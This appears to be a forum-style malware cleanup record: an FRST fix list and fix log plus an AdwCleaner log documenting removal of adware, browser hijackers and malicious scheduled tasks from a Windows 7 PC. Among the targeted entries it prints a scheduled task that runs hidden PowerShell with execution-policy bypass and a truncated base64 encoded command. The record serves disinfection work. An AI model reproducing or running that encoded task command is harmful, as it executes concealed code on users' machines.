SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry h... (long line)
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION
Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdoma... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe|/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /coded... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe?/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe?/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe?/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hx... (long line)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

C:\Windows\System32\Tasks\Plus-HD-1.2-updater
C:\Program Files (x86)\Plus-HD-1.2
C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller
C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller
C:\Windows\System32\Tasks\LaunchSignup
C:\Program Files (x86)\MyPC Backup
C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader
C:\Windows\System32\Tasks\Plus-HD-1.2-enabler
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC}
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
C\Windows\System32\Tasks\AmiUpdXp
C:\Users\Tech 14\AppData\Local\29033
C:\Windows\\Tasks\AmiUpdXp.job
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
C:\windows\Tasks\Plus-HD-1.2-enabler.job
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
C:\windows\Tasks\Plus-HD-1.2-updater.job

C:\Program Files (x86)\Mobogenie
C:\Users\Tech 14\AppData\Roaming\newnext.me
C:\ProgramData\llEsss2pay
C:\ProgramData\llEsss2pay

End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mobilegeni daemon" => removed successfully
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Windows\CurrentVersion\Run\\NextLive" => removed successfully
"HKLM\SOFTWARE\Policies\Google" => removed successfully
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => removed successfully
HKLM\Software\Classes\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => removed successfully
HKLM\Software\Classes\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => removed successfully
HKLM\Software\Classes\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => removed successfully
HKLM\Software\Classes\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => not found
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311121155}" => removed successfully
HKLM\Software\Classes\CLSID\{11111111-1111-1111-1111-110311121155} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
"HKLM\Software\Classes\CLSID\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618}" => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311121155}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{11111111-1111-1111-1111-110311121155} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{A555676B-2A0B-9B19-8CC1-D4ED88AC8618} => not found
"HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => removed successfully
HKLM\Software\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => not found
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\System\CurrentControlSet\Services\pdfcDispatcher" => removed successfully
pdfcDispatcher => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{377FBCA9-E775-4F65-9277-ED0882D40ED0}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{377FBCA9-E775-4F65-9277-ED0882D40ED0}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-updater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-updater" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63F10999-1085-44F5-92F4-00E3050A14A6}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63F10999-1085-44F5-92F4-00E3050A14A6}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-chromeinstaller => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-chromeinstaller" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6A0BBF0A-DE94-41FE-9157-FF8D9970AB11}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6A0BBF0A-DE94-41FE-9157-FF8D9970AB11}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-firefoxinstaller" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AA72BE28-D781-4FCA-A97F-27CAA5C4187D}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA72BE28-D781-4FCA-A97F-27CAA5C4187D}" => removed successfully
C:\windows\System32\Tasks\LaunchSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchSignup" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE}" => removed successfully
C:\windows\System32\Tasks\Plus-HD-1.2-codedownloader => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-codedownloader" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E7F157B8-18FC-44F8-9362-7CF6F27B0696}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7F157B8-18FC-44F8-9362-7CF6F27B0696} => could not remove. Access Denied.
"C:\windows\System32\Tasks\Plus-HD-1.2-enabler" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-enabler => could not remove. Access Denied.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE}" => removed successfully
C:\windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B68E879D-FE0E-7106-2643-B9053FB27FCC}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FA9233DD-423A-457F-BD31-003D43E5F021}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FA9233DD-423A-457F-BD31-003D43E5F021}" => removed successfully
C:\windows\System32\Tasks\AmiUpdXp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AmiUpdXp" => removed successfully
"C:\windows\Tasks\AmiUpdXp.job" => not found
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => moved successfully
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => moved successfully
"C:\windows\Tasks\Plus-HD-1.2-enabler.job" => not found
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => moved successfully
C:\windows\Tasks\Plus-HD-1.2-updater.job => moved successfully
C:\ProgramData\TEMP => ":373E1720" ADS removed successfully
"C:\Windows\System32\Tasks\Plus-HD-1.2-updater" => not found
"C:\Program Files (x86)\Plus-HD-1.2" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller" => not found
"C:\Windows\System32\Tasks\LaunchSignup" => not found
C:\Program Files (x86)\MyPC Backup => moved successfully
"C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader" => not found
"C:\Windows\System32\Tasks\Plus-HD-1.2-enabler" => not found
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => Error: No automatic fix found for this entry.
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe => moved successfully
C\Windows\System32\Tasks\AmiUpdXp => Error: No automatic fix found for this entry.
"C:\Users\Tech 14\AppData\Local\29033" => not found
"C:\Windows\\Tasks\AmiUpdXp.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-codedownloader.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-enabler.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job" => not found
"C:\windows\Tasks\Plus-HD-1.2-updater.job" => not found
"C:\Program Files (x86)\Mobogenie" => not found
C:\Users\Tech 14\AppData\Roaming\newnext.me => moved successfully
C:\ProgramData\llEsss2pay => moved successfully
"C:\ProgramData\llEsss2pay" => not found

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 14378684 B
Java, Flash, Steam htmlcache => 6619 B
Windows/system/drivers => 555801277 B
Edge => 0 B
Chrome => 14659793 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42305567 B
systemprofile32 => 115380 B
LocalService => 0 B
NetworkService => 278211578 B
Tech 14 => 897346840 B

RecycleBin => 0 B
EmptyTemp: => 1.7 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 23-03-2018 22:06:39)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7F157B8-18FC-44F8-9362-7CF6F27B0696} => could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-enabler => could not remove. Access Denied.

==== End of Fixlog 22:06:39 ====

 

 

 

# AdwCleaner 7.0.8.0 - Logfile created on Sat Mar 24 02:31:34 2018
# Updated on 2018/08/02 by Malwarebytes
# Running on Windows 7 Home Premium (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Users\Tech 14\AppData\Local\Mobogenie
Deleted: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie
Deleted: C:\Users\Tech 14\Documents\Mobogenie
Deleted: C:\Users\Tech 14\AppData\Local\genienext
Deleted: C:\Users\Tech 14\AppData\Local\apn
Deleted: C:\Users\Tech 14\AppData\Local\SwvUpdater
Deleted: C:\ProgramData\5c8acd7ea0d02786
Deleted: C:\ProgramData\{0a376664-50c8-0}
Deleted: C:\ProgramData\{0b6c3ba4-10c8-1}


***** [ Files ] *****

Deleted: C:\Users\Tech 14\daemonprocess.txt


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cloudfront.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cmptch.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\coupontime.co
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ddts0bzupd01y.cloudfront.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\foxi180_f.tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\foxi69.tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pricepeep.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.cmptch.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.coupontime00.coupontime.co
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\static.pricepeep00.pricepeep.net
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\superfish.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\tlscdn.com
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.superfish.com
Deleted: [Key] - HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\InstalledBrowserExtensions
Deleted: [Key] - HKCU\Software\InstalledBrowserExtensions
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{67BD9EEB-AA06-4329-A940-D250019300C9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKCU\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKLM\SOFTWARE\DomaIQ
Deleted: [Key] - HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-19\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-20\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKU\S-1-5-18\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Deleted: [Key] - HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Deleted: [Key] - HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKCU\Software\AppDataLow\Software\Crossrider
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.BHO
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.BHO.1
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.Sandbox
Deleted: [Key] - HKLM\SOFTWARE\Classes\CrossriderApp0031255.Sandbox.1
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89d2eaeb-aa55-4195-93be-28477ff9493a}


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

